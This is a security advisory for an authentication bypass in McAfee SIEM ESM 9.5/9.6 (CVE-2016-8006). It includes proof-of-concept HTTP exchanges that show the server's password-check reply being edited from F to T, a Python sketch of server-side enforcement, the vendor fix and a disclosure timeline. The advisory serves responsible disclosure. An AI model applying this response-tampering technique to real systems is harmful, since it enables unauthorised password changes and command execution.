McAfee SIEM ESM and ESMREC Authentication Bypass vulnerability

12-09-2016


Advisory McAfee SIEM ESM and ESMREC Authentication Bypass vulnerability
Affected Product: SIEM 9.5 and 9.6.
Credits: Vulnerability discovered by Claudio Cinquino of Quantum Leap S.R.L.
CVE: CVE-2016-8006

Executive Summary

SIEM 9.5 and 9.6.0 allow an administrative user to make changes to other SIEM users’ information including user passwords without supplying the current admin password a second time. GUI “Terminal” commands are also allowed by an active logged-in admin user without supplying the logged-in admin password a second time.


Proof of Concept

An authentication bypass vulnerability was found in the “Users and Groups” and “Terminal” forms of McAfee SIEM ESM 9.5.x and 9.6.x. The client asks the server to verify the re-entered admin password (USER_VERIFYPW) and then trusts the OK flag in the reply, so entering any password in the form and changing the response flag from F to T is enough to bypass the check.

Authentication Bypass vulnerability on Users and Groups

Request:

POST /ess HTTP/1.1
Host: 192.168.164.110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: https://192.168.164.110/Application.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 72

Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

Original Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:08:31 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

Edited Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:08:31 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14

Authentication Bypass vulnerability on Terminal

Request:

POST /ess HTTP/1.1
Host: 192.168.164.110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: https://192.168.164.110/Application.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 72

Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

Original Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:13:57 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

Edited Response:

HTTP/1.1 200 OK
Date: Thu, 12 May 2016 09:13:57 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14

Figure 1 shows an example of the authentication bypass on McAfee SIEM 9.5 and 9.6 for “Users and Groups”.

Figure 1 - “Users and Groups” Authentication Bypass Vulnerability McAfee SIEM ESM 9.5.0MR7 PoC

Solution

To fix the security issue we recommend updating to SIEM 9.6.0 MR3, in which the vendor has resolved this issue.
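As an added illustration (not McAfee's code and not part of the original advisory), the Python below decodes the Request=/Response= body format shown in the proof of concept above (fields separated by byte 0x13, records by byte 0x14, URL-encoded) and shows the enforcement the fix requires: the server records the outcome of USER_VERIFYPW in its own session state and gates the privileged operation on that state, so a response edited to OK=T on its way to the client changes nothing. The USER_SETPW call, the in-memory session set and the mock password are assumptions.

```python
# Added defender-side illustration, not McAfee's code: decode the ESM "API" body
# format from the advisory (fields separated by 0x13, records by 0x14, URL-encoded)
# and keep the result of USER_VERIFYPW in server-side session state, so a response
# edited to OK=T on its way to the client does not unlock the privileged call.
# USER_SETPW, the in-memory session set and the mock password are hypothetical.
import hmac
from urllib.parse import quote, unquote

FS, RS = "\x13", "\x14"  # field and record separators inside Request=/Response= bodies

def decode_api(body: str) -> dict:
    """'Request=API%13USER%5FVERIFYPW%13%14SID%13...' -> {'API': 'USER_VERIFYPW', 'SID': ...}"""
    _, _, payload = body.partition("=")
    out = {}
    for rec in unquote(payload).split(RS):
        if rec:  # each record is KEY 0x13 VALUE 0x13
            key, _, value = rec.rstrip(FS).partition(FS)
            out[key] = value
    return out

def encode_api(kind: str, fields) -> str:
    """Inverse of decode_api; quote() leaves '_' bare where the client sends %5F, which decodes identically."""
    raw = "".join(f"{k}{FS}{v}{FS}{RS}" for k, v in fields)
    return f"{kind}=" + quote(raw, safe="")

class HardenedServer:
    """Mock ESM that enforces the re-authentication check on the server, not in the client."""

    def __init__(self, admin_password: str):
        self._pw = admin_password.encode()
        self._verified = set()  # session IDs whose USER_VERIFYPW succeeded here

    def handle(self, request_body: str) -> str:
        req = decode_api(request_body)
        call, sid = req.get("API"), req.get("SID")
        if call == "USER_VERIFYPW":
            ok = hmac.compare_digest(req.get("PW", "").encode(), self._pw)
            if ok:
                self._verified.add(sid)
            return encode_api("Response", [("EC", "0"), ("OK", "T" if ok else "F"), ("DCHNG", "F")])
        if call == "USER_SETPW":  # hypothetical privileged operation
            if sid not in self._verified:  # what the client believes about OK is irrelevant
                return encode_api("Response", [("EC", "1"), ("OK", "F")])
            self._verified.discard(sid)  # one verification covers one privileged call
            return encode_api("Response", [("EC", "0"), ("OK", "T")])
        return encode_api("Response", [("EC", "1"), ("OK", "F")])
```

The decoded request from the advisory yields {'API': 'USER_VERIFYPW', 'SID': '1300480451', 'PW': 'test'}, and encode_api reproduces the advisory's original response byte for byte.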

Disclosure Timeline

11/05/2016 – Vulnerability Discovered
12/05/2016 – Initial vendor notification
09/09/2016 – The vendor fixed the vulnerability
09/09/2016 – The vendor published a Knowledge Base bulletin
16/09/2016 – CVE Assigned

References

[1] http://cwe.mitre.org/data/definitions/592.html
[2] https://www.owasp.org/index.php/Category:Authentication_Vulnerability
[3] https://kc.mcafee.com/corporate/index?page=content&id=KB87744